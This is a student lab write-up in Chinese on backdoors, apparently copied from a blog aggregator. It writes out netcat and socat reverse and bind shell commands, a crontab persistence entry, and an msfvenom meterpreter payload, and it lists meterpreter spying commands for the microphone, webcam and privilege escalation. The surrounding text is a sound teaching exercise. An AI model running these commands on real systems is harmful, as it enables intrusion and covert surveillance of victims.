20155324《网络对抗》Exp2 后门原理与实践

时间:2022-07-26 22:46:19

20155324《网络对抗》Exp2 后门原理与实践

20155324《网络对抗》Exp2 后门原理与实践

常用后门工具实践

Windows获得Linux Shell

  1. 在Windows下,先使用ipconfig指令查看本机IP:

    20155324《网络对抗》Exp2 后门原理与实践

  2. 使用ncat.exe程序监听本机的5324端口:

20155324《网络对抗》Exp2 后门原理与实践

  1. 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5324端口:

20155324《网络对抗》Exp2 后门原理与实践

  1. Windows下成功获得了一个Kalishell,运行ls指令如下:

20155324《网络对抗》Exp2 后门原理与实践

Linux获得Windows Shell

  1. 过程与之前的类似,在Kali环境下用ifconfig查看IP:

    20155324《网络对抗》Exp2 后门原理与实践

  2. 使用nc指令监听5324端口:

    20155324《网络对抗》Exp2 后门原理与实践

  3. 在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5324端口:

    20155324《网络对抗》Exp2 后门原理与实践

  4. Kali下可以看到Windows的命令提示,可以输入Windows命令:

    20155324《网络对抗》Exp2 后门原理与实践

使用nc传输数据

  1. Windows下监听5324端口:

    20155324《网络对抗》Exp2 后门原理与实践

  2. Kali下连接到Windows的5324端口:

    20155324《网络对抗》Exp2 后门原理与实践

  3. 建立连接之后,就可以传输数据了,这里传输的是字符串,相当于两台主机在聊天,也可以用重定向操作符来传输文件:

    20155324《网络对抗》Exp2 后门原理与实践

实验内容

使用netcat获取主机操作Shell,cron启动

  1. 先在Windows系统下,监听5324端口:

    20155324《网络对抗》Exp2 后门原理与实践

  2. Kali环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。

    20155324《网络对抗》Exp2 后门原理与实践

  3. crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行

  4. 在最后一行添加13 * * * * /bin/netcat 192.168.1.103 5324 -e /bin/sh,意思是在每个小时的第37分钟反向连接Windows主机的5324端口,设置成37的原因是我当时的时间是19点36,为了能立马看到效果,所以我将时间设置在了一分钟以后:

    20155324《网络对抗》Exp2 后门原理与实践

  5. 当时间到了16点13时,此时已经获得了Kali的shell,可以输入指令(如果在这之前输入指令,屏幕上不会有显示,但是等到了13分时会立马显示出来):

    20155324《网络对抗》Exp2 后门原理与实践

使用socat获取主机操作Shell, 任务计划启动

基础知识

  1. socatncat的增强版,它使用的格式是socat [options] <address> <address>,其中两个address是必选项,而options 是可选项。

  2. socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

实践过程

  1. 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:20155324《网络对抗》Exp2 后门原理与实践
  2. 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5324 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5324,同时把cmd.exestderr重定向到stdout上:20155324《网络对抗》Exp2 后门原理与实践
  3. 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:

20155324《网络对抗》Exp2 后门原理与实践

4. 此时,在Kali环境下输入指令socat - tcp:192.168.1.103:5324,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5324端口,此时可以发现已经成功获得了一个cmd shell

20155324《网络对抗》Exp2 后门原理与实践

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  1. 输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.128 LPORT=5324 -f exe > 2015324_backdoor.exe

生成后门程序:

20155324《网络对抗》Exp2 后门原理与实践

通过nc指令将生成的后门程序传送到Windows主机上:

20155324《网络对抗》Exp2 后门原理与实践

20155324《网络对抗》Exp2 后门原理与实践

在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

20155324《网络对抗》Exp2 后门原理与实践

在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp,继续设置IP(此处设置虚拟机的Linux的IP地址)和端口

20155324《网络对抗》Exp2 后门原理与实践

Linux使用exploit命令开始监听,此时在Win上执行后门程序。

20155324《网络对抗》Exp2 后门原理与实践

打开Windows上的后门程序:

20155324《网络对抗》Exp2 后门原理与实践

此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

20155324《网络对抗》Exp2 后门原理与实践

  • 录音功能:record_mic

20155324《网络对抗》Exp2 后门原理与实践

  • 拍照功能:webcam_snap

20155324《网络对抗》Exp2 后门原理与实践

20155324《网络对抗》Exp2 后门原理与实践

  • 拍摄视频功能:webcam_stream

20155324《网络对抗》Exp2 后门原理与实践

  • 记录击键功能:screenshot

20155324《网络对抗》Exp2 后门原理与实践

  • 提权:getuid以及getsystem

20155324《网络对抗》Exp2 后门原理与实践

实验总结与体会

通过本次实验我都惊了!通过电脑直接的控制来实现一些功能,从而达到目的。所以我们要在日常使用电脑的过程中正确的使用,不让居心不轨者有可乘之机。

20155324《网络对抗》Exp2 后门原理与实践的更多相关文章

  1. 20155323刘威良 网络对抗 Exp2 后门原理与实践

    20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...

  2. 20155331 丹增旦达 网络攻防 Exp2后门原理与实践

    20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155302 Exp2 后门原理与实践

    20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  5. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  6. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  7. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  8. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  9. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

随机推荐

  1. 企业IT管理员IE11升级指南【16】—— 使用Compat Inspector快速定位IE兼容性问题

    企业IT管理员IE11升级指南 系列: [1]—— Internet Explorer 11增强保护模式 (EPM) 介绍 [2]—— Internet Explorer 11 对Adobe Flas ...

  2. STORM&lowbar;0001&lowbar;用vmware拷贝出三个相同的ubuntu搭建小的zookeeper集群

    第一次配置zookeeper的集群 因为想运行storm必须搭建集群在自己的电脑上拷贝了自己的ubuntu虚拟机采用的是vmware给虚拟机分配的地址三个机器的配置基本上一样除了myid这个文件看了这 ...

  3. 函数fsp&lowbar;get&lowbar;space&lowbar;header

    /**********************************************************************//** Gets a pointer to the sp ...

  4. Python自动化运维之17、Python操作 Memcache、Redis、RabbitMQ

    一.Memcached Memcached 是一个高性能的分布式内存对象缓存系统,用于动态Web应用以减轻数据库负载.它通过在内存中缓存数据和对象来减少读取数据库的次数,从而提高动态.数据库驱动网站的 ...

  5. hive metastore Server 出现异常

    报错信息: 常见问题分析: 1 hive metastore 数据库中用户名或者密码出现更改,并且重启了hive,导致生效但是CDH下没有及时更改hive metastore设置密码 2 Mysql ...

  6. Caffe、TensorFlow、MXnet三个开源库对比

    库名称 开发语言 支持接口 安装难度(ubuntu) 文档风格 示例 支持模型 上手难易 Caffe c++/cuda c++/python/matlab *** * *** CNN ** MXNet ...

  7. Safari不兼容Javascript中的Date问题

    在IOS5以上版本(不包含IOS5)中的Safari浏览器能正确解释出Javascript中的 new Date('2013-10-21') 的日期对象,但是在IOS5版本里面的Safari解释new ...

  8. SQL从一个表查询数据插入&sol;更新到另一个表

    示例一: 从数据库表A中查询出数据插入到数据库表B 从数据库DataBaseA的表TDA中查询出数据插入到数据库DataBaseB的表TDB insert into [DataBaseA].[dbo] ...

  9. 编译OSG&lowbar;FBX插件

    安装FBX的SDK,例如C:\Program Files\Autodesk\FBX\FBX SDK\2017.1\ 在CMake配置lib库路径的时候,使用 C:\Program Files\Auto ...

  10. 为什么写《Tomcat内核设计剖析》

    三四年前更多地还是做web业务开发,基本不关心web层以下的东西,但是每次出故障时面对现象都不能从脑子里形成由底层到应用层的完整的逻辑,往往只能分析到Web应用就无法继续往下,Web容器完全就是一个黑 ...